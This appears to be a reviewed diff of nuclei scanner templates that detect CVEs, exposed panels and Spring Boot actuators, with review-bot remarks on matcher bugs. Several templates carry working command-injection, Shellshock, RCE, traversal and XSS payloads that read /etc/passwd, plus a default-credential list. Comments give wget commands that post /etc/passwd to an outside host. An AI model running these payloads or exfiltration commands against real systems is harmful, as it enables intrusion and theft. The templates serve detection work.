description: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory.
reference: https://github.com/OpenTSDB/opentsdb/issues/2051
# Extracting /etc/passwd to remote host:-
# /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- plotted
- timing
- cachehit
part: body
condtion: and
- type: word
words:
- application/json
part: header
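Review bot: `condtion: and` is misspelled here too, so the `plotted` / `timing` / `cachehit` regexes match as OR. More importantly, the request injects `system('wget http://example.com')` into `yrange`, which makes the scanned host perform an outbound HTTP request, yet none of the matchers depend on that command running; the match is effectively on the `/q` endpoint answering 200 with JSON. Either match on something the injected command changes, or state in `description` that this is an endpoint probe with a command-execution side effect so users can decide whether to run it.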

View File

@ -0,0 +1,33 @@
id: CVE-2020-8515
info:
name: DrayTek pre-auth RCE
author: pikpikcu
severity: critical
reference: https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
# References:
# https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
# https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
requests:
- raw:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200
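Review bot: the netlab.360.com link appears twice, once in `reference:` and once in the `# References:` comment block; keep the `reference:` field (it accepts a list) and fold the draytek.com advisory into it, then drop the comments.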

View File

@ -24,21 +24,6 @@ requests:
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}:8080
Origin: http://{{Hostname}}:8080
Content-Type: application/xml
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}:8443
Origin: https://{{Hostname}}:8443
Content-Type: application/xml
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
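Review bot: removing the `:8080` and `:8443` variants is consistent with the rest of this commit (solr-exposure loses its `:9000` / `:8080` / `:9090` paths the same way), since `{{Hostname}}` already carries whatever port the user supplied; it still deserves a changelog line, because users who relied on the template probing 8080 and 8443 on a bare hostname now have to pass those ports explicitly.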

View File

@ -0,0 +1,29 @@
id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
author: pudsec
severity: low
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873
requests:
- method: GET
path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"
part: body
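Review bot: with `redirects: true` the matcher needs a 200 and `<title>Example Domain</title>`, which means the scanner itself must be able to reach example.com; on an offline or egress-restricted engagement every target becomes a false negative. The CVE-2018-14574 template in this same commit takes the safer route of matching the `Location:` header with redirects off; doing the same here also avoids following six redirects per host.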

View File

@ -0,0 +1,50 @@
id: CVE-2021-25646
info:
name: Apache Druid RCE
author: pikpikcu
severity: critical
reference: https://paper.seebug.org/1476/
description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
# To read system Files, replace (wget example.com) with below payload
# wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
condtion: and
- type: regex
regex:
- "numRowsRead"
- "numRowsIndexed"
part: body
condtion: and
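Review bot: `condtion: and` is misspelled on both the header and body matchers, so each falls back to OR. The raw request hard-codes `Content-Length: 1006` while the JSON body is spread over several indented lines, so the declared length and the bytes actually sent are unlikely to agree; drop the header. The payload also makes the target fetch `https://druid.apache.org/data/example-manifests.tsv` and run `wget example.com`, so a Druid instance without egress may fail before the JavaScript filter runs and be reported clean; say so in `description`.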

View File

@ -0,0 +1,30 @@
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
# Refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
requests:
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
condition: and
part: header
- type: word
words:
- "config.admin.username"
- "config.admin.password"
condition: and
part: body
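Review bot: the path `{{BaseURL}}/../conf/config.properties` only works if the literal `/../` segment reaches the server; HTTP clients and intermediaries commonly normalize dot segments, so confirm on the wire or send it as a raw request. The `condition: and` on the single-word `application/octet-stream` matcher is a no-op, and the `# Refrence` comment (also misspelled) should be a `reference:` field.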

0
default-logins/ambari/ambari-default-credentials.yaml Executable file → Normal file
View File

View File

@ -8,15 +8,40 @@ requests:
- payloads:
username:
- tomcat
- admin
- ovwebusr
- j2deployer
- cxsdk
- ADMIN
- xampp
- tomcat
- QCC
- admin
- root
- role1
- role
- tomcat
- admin
- role1
password:
- tomcat
- admin
- guest
- password
- test
- 12345
- 123456
- OvW*busr1
- j2deployer
- kdsxc
- ADMIN
- xampp
- s3cret
- QLogic66
- tomcat
- root
- role1
- changethis
- changethis
- j5Brn9
- tomcat
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
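Review bot: the lists read as matched pairs (`ovwebusr` / `OvW*busr1`, `j2deployer` / `j2deployer`, `cxsdk` / `kdsxc`, `QCC` / `QLogic66`) but `attack: clusterbomb` tries every username against every password: 16 usernames x 21 passwords = 336 login attempts per host, and the duplicates (`tomcat` and `admin` three times each, `role1` twice in usernames; `tomcat` three times and `changethis` twice in passwords) add nothing. Dedupe the lists (11 x 18 = 198 attempts) or, if the pairs are intentional, switch to `pitchfork`; several hundred attempts against a manager application is also account-lockout and log-noise territory and should be noted in `info`.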

default-logins/ofbiz/ofbiz-default-credentials.yaml Executable file → Normal file
default-logins/zabbix/zabbix-default-credentials.yaml Executable file → Normal file
exposed-panels/active-admin-exposure.yaml Executable file → Normal file
exposed-panels/activemq-panel.yaml Executable file → Normal file
exposed-panels/airflow-exposure.yaml Executable file → Normal file
exposed-panels/couchdb-exposure.yaml Executable file → Normal file
exposed-panels/couchdb-fauxton.yaml Executable file → Normal file
exposed-panels/druid-console-exposure.yaml Executable file → Normal file
exposed-panels/exposed-pagespeed-global-admin.yaml Executable file → Normal file
exposed-panels/flink-exposure.yaml Executable file → Normal file
exposed-panels/hadoop-exposure.yaml Executable file → Normal file
exposed-panels/kafka-connect-ui.yaml Executable file → Normal file
exposed-panels/kafka-monitoring.yaml Executable file → Normal file
exposed-panels/kafka-topics-ui.yaml Executable file → Normal file

@ -0,0 +1,17 @@
id: key-cloak-admin-panel
info:
name: Keycloak Admin Panel
author: incogbyte
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/auth/admin/master/console/"
matchers:
- type: word
words:
- "<a href=\"http://www.keycloak.org\">"
part: body
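Review bot: the template has a single body-word matcher and no status check, so any response that carries a link to `http://www.keycloak.org` (a themed 404 or a login page with the vendor footer) is reported as an exposed admin console. Add a `- type: status` matcher with `- 200` and `matchers-condition: and`, as the other panel templates in this patch do, and prefer a body token that only the console page itself renders over a generic vendor link.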


@ -9,6 +9,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/manager/html'
- '{{BaseURL}}/host-manager/html'
matchers-condition: and
matchers:

exposed-panels/rocketmq-console-exposure.yaml Executable file → Normal file
exposed-panels/selenoid-ui-exposure.yaml Executable file → Normal file
exposed-panels/setup-page-exposure.yaml Executable file → Normal file
exposed-panels/solr-exposure.yaml Executable file → Normal file

@ -9,9 +9,6 @@ requests:
- method: GET
path:
- "{{BaseURL}}/sessions/new"
- "{{BaseURL}}:9000/sessions/new"
- "{{BaseURL}}:8080/sessions/new"
- "{{BaseURL}}:9090/sessions/new"
matchers:
- type: word


@ -8,6 +8,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers:

exposed-panels/yarn-manager-exposure.yaml Executable file → Normal file
exposed-panels/zipkin-exposure.yaml Executable file → Normal file
exposed-tokens/aws/amazon-mws-auth-token-value.yaml Executable file → Normal file
exposed-tokens/aws/aws-access-key-value.yaml Executable file → Normal file
exposed-tokens/google/google-api-key.yaml Executable file → Normal file
exposed-tokens/mailchimp/mailchimp-api-key.yaml Executable file → Normal file
exposures/configs/airflow-configuration-exposure.yaml Executable file → Normal file

@ -0,0 +1,34 @@
id: alibaba-canal-info-leak
info:
name: Alibaba Canal Info Leak
author: pikpikcu
severity: info
# https://github.com/alibaba/canal/issues/632
# https://netty.io/wiki/reference-counted-objects.html
# https://my.oschina.net/u/4581879/blog/4753320
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/canal/config/1/1"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "ncanal.aliyun.accessKey"
- "ncanal.aliyun.secretKey"
condition: and
part: body
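Review bot: the body words `ncanal.aliyun.accessKey` and `ncanal.aliyun.secretKey` carry a leading `n` that looks like the remnant of an escaped newline (`\ncanal...`); if the property names in the response are `canal.aliyun.accessKey` and `canal.aliyun.secretKey`, this matcher never fires and the template silently reports nothing. Confirm the intended strings against a real response. The three references are YAML comments and are discarded by the parser; move them under a `reference:` key in `info` as the other templates in this patch do. The `Content-Type: application/json` header on a body-less GET serves no purpose and can be dropped.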

exposures/configs/amazon-docker-config-disclosure.yaml Executable file → Normal file
exposures/configs/ansible-config-disclosure.yaml Executable file → Normal file

@ -0,0 +1,28 @@
id: gmail-api-client-secrets
info:
name: GMail API client_secrets.json
author: geeknik
severity: info
description: https://developers.google.com/gmail/api/auth/web-server
requests:
- method: GET
path:
- "{{BaseURL}}/client_secrets.json"
matchers-condition: and
matchers:
- type: word
words:
- "client_id"
- "auth_uri"
- "token_uri"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
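Review bot: `description:` holds only a URL; put the link under `reference:` and use `description` for a one-line statement of what the template finds (an OAuth `client_secrets.json` served from the web root), so the finding reads sensibly in tooling output. The first word matcher has no `part:`; nuclei defaults to the body, but stating `part: body` explicitly keeps it consistent with the header matcher below it.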

exposures/configs/perl-status.yaml Executable file → Normal file
exposures/configs/symfony-database-config.yaml Executable file → Normal file

@ -1,35 +0,0 @@
id: wp-plugin-scan
info:
name: Wordpress Plugin Scanner
author: pdteam
severity: info
description: wordlist based wordpress plugin scanner.
requests:
- payloads:
plugin_wordlist: helpers/wordlists/wp-plugins.txt
# Thanks to RandomRobbieBF for the wordlist
# https://github.com/RandomRobbieBF/wordpress-plugin-list
attack: sniper
threads: 50
raw:
- |
GET /§plugin_wordlist§ HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "== Description =="


@ -1,16 +0,0 @@
id: basic-cors-misconfig-flash
info:
name: Basic CORS misconfiguration exploitable with Flash
author: nadino
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/crossdomain.xml"
matchers:
- type: word
words:
- 'allow-access-from domain="*"'
part: body

misconfiguration/airflow-api-exposure.yaml Executable file → Normal file

@ -9,9 +9,7 @@ requests:
- method: GET
path:
- "http://{{Hostname}}/version"
- "http://{{Hostname}}:2376/version"
- "http://{{Hostname}}/v1.24/version"
- "http://{{Hostname}}:2376/v1.24/version"
matchers-condition: and
matchers:


@ -0,0 +1,24 @@
id: php-fpm-status
info:
name: PHP-FPM Status
author: geeknik
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/status?full"
matchers-condition: and
matchers:
- type: word
words:
- 'pool:'
- 'process manager:'
- 'start time:'
- 'pid:'
condition: and
- type: status
status:
- 200


@ -3,7 +3,7 @@ id: salesforce-aura-misconfig
info:
name: Detect the exposure of Salesforce Lightning aura API
author: aaron_costello (@ConspiracyProof)
severity: medium
severity: info
# Reference:-
# https://www.enumerated.de/index/salesforce


@ -1,97 +0,0 @@
id: springboot-actuators
info:
name: Detect the exposure of Springboot Actuators
author: that_juan_ & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/actuator/auditevents"
- "{{BaseURL}}/actuator/auditLog"
- "{{BaseURL}}/actuator/beans"
- "{{BaseURL}}/actuator/caches"
- "{{BaseURL}}/actuator/conditions"
- "{{BaseURL}}/actuator/configprops"
- "{{BaseURL}}/actuator/configurationMetadata"
- "{{BaseURL}}/actuator/dump"
- "{{BaseURL}}/actuator/env"
- "{{BaseURL}}/actuator/events"
- "{{BaseURL}}/actuator/exportRegisteredServices"
- "{{BaseURL}}/actuator/features"
- "{{BaseURL}}/actuator/flyway"
- "{{BaseURL}}/actuator/healthcheck"
- "{{BaseURL}}/actuator/heapdump"
- "{{BaseURL}}/actuator/httptrace"
- "{{BaseURL}}/actuator/hystrix.stream"
- "{{BaseURL}}/actuator/integrationgraph"
- "{{BaseURL}}/actuator/jolokia"
- "{{BaseURL}}/actuator/liquibase"
- "{{BaseURL}}/actuator/logfile"
- "{{BaseURL}}/actuator/loggers"
- "{{BaseURL}}/actuator/loggingConfig"
- "{{BaseURL}}/actuator/management"
- "{{BaseURL}}/actuator/mappings"
- "{{BaseURL}}/actuator/metrics"
- "{{BaseURL}}/actuator/refresh"
- "{{BaseURL}}/actuator/registeredServices"
- "{{BaseURL}}/actuator/releaseAttributes"
- "{{BaseURL}}/actuator/resolveAttributes"
- "{{BaseURL}}/actuator/scheduledtasks"
- "{{BaseURL}}/actuator/sessions"
- "{{BaseURL}}/actuator/shutdown"
- "{{BaseURL}}/actuator/springWebflow"
- "{{BaseURL}}/actuator/sso"
- "{{BaseURL}}/actuator/ssoSessions"
- "{{BaseURL}}/actuator/statistics"
- "{{BaseURL}}/actuator/status"
- "{{BaseURL}}/actuator/threaddump"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/auditevents"
- "{{BaseURL}}/autoconfig"
- "{{BaseURL}}/beans"
- "{{BaseURL}}/cloudfoundryapplication"
- "{{BaseURL}}/configprops"
- "{{BaseURL}}/dump"
- "{{BaseURL}}/env"
- "{{BaseURL}}/heapdump"
- "{{BaseURL}}/hystrix.stream"
- "{{BaseURL}}/jolokia"
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/loggers"
- "{{BaseURL}}/management"
- "{{BaseURL}}/mappings"
- "{{BaseURL}}/metrics"
- "{{BaseURL}}/threaddump"
- "{{BaseURL}}/trace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "method"
- "spring"
- "TYPE"
- "system"
- "database"
- "cron"
- "reloadByURL"
- "JMXConfigurator"
- "JMImplementation"
- "EnvironmentManager"
- "org.springframework.boot.loader"
- "health"
condition: or
- type: status
status:
- 200
- type: word
words:
- "X-Application-Context"
- "application/json"
- "application/vnd.spring-boot.actuator"
- "hprof"
condition: or
part: header
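Review bot: the removed template probed a long list of actuator endpoints (auditevents, beans, caches, jolokia, sessions, shutdown, threaddump, httptrace, the legacy non-`/actuator` paths and more) that none of the per-endpoint templates added in this patch (configprops, env, heapdump, loggers, mappings, trace, plus the bare `/actuator` detector) cover. Splitting the monolith into per-endpoint checks with specific matchers is an improvement, but the coverage loss should be deliberate: either add templates for the dropped endpoints or record in the commit message that they were intentionally removed.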


@ -0,0 +1,32 @@
id: springboot-configprops
info:
name: Detect Springboot Configprops Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Sensitive environment variables may not be masked
requests:
- method: GET
path:
- "{{BaseURL}}/configprops"
- "{{BaseURL}}/actuator/configprops"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "org.springframework.boot.actuate"
- "beans"
- "contexts"
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header


@ -0,0 +1,33 @@
id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: high
description: Sensitive environment variables may not be masked
requests:
- method: GET
path:
- "{{BaseURL}}/env"
- "{{BaseURL}}/actuator/env"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "JAVA_HOME"
- "sping.config.location"
- "spring.application.name"
- "local.server.port"
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
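Review bot: `sping.config.location` in the body words is a typo for `spring.config.location`; as written that token can never match and detection rests on the other three words. Because the matcher uses `condition: or`, responses containing `JAVA_HOME` or `spring.application.name` still fire, but the misspelt token should be corrected so the intended signal is actually checked.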


@ -0,0 +1,38 @@
id: springboot-heapdump
info:
name: Detect Springboot Heapdump Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
requests:
- method: GET
path:
- "{{BaseURL}}/heapdump"
- "{{BaseURL}}/actuator/heapdump"
matchers-condition: and
matchers:
- type: binary
part: body
binary:
- "4a4156412050524f46494c45" # "JAVA PROFILE"
- "4850524f46" # "HPROF"
- "1f8b080000000000" # Gunzip magic byte
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
- type: dsl
dsl:
- "len(body) >= 100000"
- "content_length >= 100000"
condition: or
part: header
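Review bot: the `dsl` matcher carries `part: header`, but `len(body)` reads the response body and `content_length` is a header value; `part` has no meaning on a dsl matcher and should be removed so the intent is not misread. The comment on `1f8b080000000000` says "Gunzip magic byte": `1f 8b` is the gzip file signature (gunzip is the decompressor), so "gzip magic bytes" is the accurate label. The other two byte strings decode to `JAVA PROFILE` and `HPROF` as their comments state.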


@ -0,0 +1,33 @@
id: springboot-loggers
info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/loggers"
- "{{BaseURL}}/actuator/loggers"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"loggers"'
- '"profiles":'
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header


@ -0,0 +1,32 @@
id: springboot-mappings
info:
name: Detect Springboot Mappings Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Additional routes may be displayed
requests:
- method: GET
path:
- "{{BaseURL}}/mappings"
- "{{BaseURL}}/actuator/mappings"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "mappings"
- "method"
- "produces"
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header


@ -0,0 +1,35 @@
id: springboot-trace
info:
name: Detect Springboot Trace Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
requests:
- method: GET
path:
- "{{BaseURL}}/trace"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "traces"
- "response"
- "request"
- "principal"
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
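Review bot: the body matcher uses `condition: or` over `traces`, `response`, `request` and `principal`; `request` and `response` appear in almost any JSON API reply, so together with a 200 status and an `application/json` content type an unrelated endpoint will be flagged as an exposed trace actuator. Use `condition: and`, or anchor on the actuator-specific `traces` key, in line with the configprops and mappings templates in this patch, which require their specific keys together.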


@ -0,0 +1,20 @@
id: detect-springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"_links":{"self"'
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: selea-ip-camera
info:
name: Detect Selea Targa IP OCR-ANPR Camera
author: geeknik
description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "SeleaCPSHttpServer"
- type: word
part: body
words:
- "Selea CarPlateServer"
- type: status
status:
- 200


@ -0,0 +1,28 @@
id: CNVD-2020-62422
info:
name: Seeyon readfile(CNVD-2020-62422)
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
words:
- "ctpDataSource.password"
condition: and
part: body

vulnerabilities/other/acme-xss.yaml Executable file → Normal file

@ -0,0 +1,27 @@
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
author: geeknik
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
requests:
- method: GET
path:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
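Review bot: the body matcher looks for `onmouseover%3dxss(0x01CE61)`, i.e. the probe with `=` percent-encoded. A reflection in that encoded form is what an application that encodes its output returns, so the match on its own does not separate a vulnerable instance from a safe one and the template is likely to report false positives. Check against the referenced advisory what the vulnerable response body actually contains and match on that form.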


@ -0,0 +1,28 @@
id: dlink-850L-info-leak
info:
name: Dlink Dir-850L Info Leak
author: pikpikcu
severity: info
reference: https://xz.aliyun.com/t/2941
requests:
- method: POST
path:
- "{{BaseURL}}/hedwig.cgi"
body: |
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
headers:
Cookie: uid=R8tBjwtFc8
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</usrid>"
- "</password>"
part: body


@ -0,0 +1,29 @@
id: keycloak-xss
info:
name: Keycloak <= 8.0 - Cross Site Scripting
author: incogbyte
severity: medium
reference: https://cure53.de/pentest-report_keycloak.pdf
requests:
- raw:
- |
POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
{"<img onerror=confirm(1337) src/>":1}
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- 'Unrecognized field "<img onerror=confirm(1337) src/>"'
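Review bot: the raw request sets `Content-Type` twice (`application/json` and then `application/x-www-form-urlencoded`); the body is JSON, so drop the form-urlencoded header. As rendered there is also no empty line between the last header and the `{"<img ...":1}` body; a raw HTTP request needs that blank line or the body is sent as a malformed header line and the 400 the matcher expects will come from the wrong cause. Confirm the separator is present in the file.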


@ -0,0 +1,26 @@
id: sangfor-edr-rce
info:
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
author: pikpikcu
severity: critical
reference: https://www.cnblogs.com/0day-li/p/13650452.html
requests:
- method: POST
path:
- "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
{"params":"w=123\"'1234123'\"|cat /etc/passwd"}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: sonicwall-sslvpn-shellshock
info:
name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T
severity: critical
reference: |
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
requests:
- raw:
- |
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: {{Hostname}}
User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept: */*
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200


@ -0,0 +1,28 @@
id: wooyun-path-traversal
info:
name: Wooyun Path Traversal
author: pikpikcu
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
A general document of UFIDA ERP-NC contains a vulnerability
(affecting a large number of well-known school government and enterprise cases
such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <DataSourceClassName>
- </DataSourceClassName>
part: body
condition: and

vulnerabilities/other/yarn-resourcemanager-rce.yaml Executable file → Normal file
vulnerabilities/thinkphp/thinkphp-2-rce.yaml Executable file → Normal file
vulnerabilities/thinkphp/thinkphp-5022-rce.yaml Executable file → Normal file
vulnerabilities/thinkphp/thinkphp-5023-rce.yaml Executable file → Normal file

@ -0,0 +1,24 @@
id: wp-enabled-registration
info:
name: WordPress user registration enabled
author: Ratnadip Gajbhiye
severity: info
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?action=register'
matchers-condition: and
matchers:
- type: word
words:
- Register For This Site
- E-mail
condtion: and
part: body
- type: status
status:
- 200
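Review bot: `condtion: and` is misspelt. nuclei ignores the unknown key, the word matcher falls back to its default `or`, and a page containing only `E-mail` satisfies it, so any login, contact or footer page that returns 200 is reported as open registration. Correct it to `condition: and`.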


@ -10,6 +10,6 @@ requests:
path:
- "{{BaseURL}}/xmlrpc.php"
matchers:
- type: status
status:
- 405
- type: word
words:
- 'XML-RPC server accepts POST requests only.'


@ -23,4 +23,8 @@ workflows:
- template: cves/2019/CVE-2019-11581.yaml
- template: cves/2020/CVE-2020-14179.yaml
- template: cves/2020/CVE-2020-14181.yaml
- template: vulnerabilities/jira/
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml


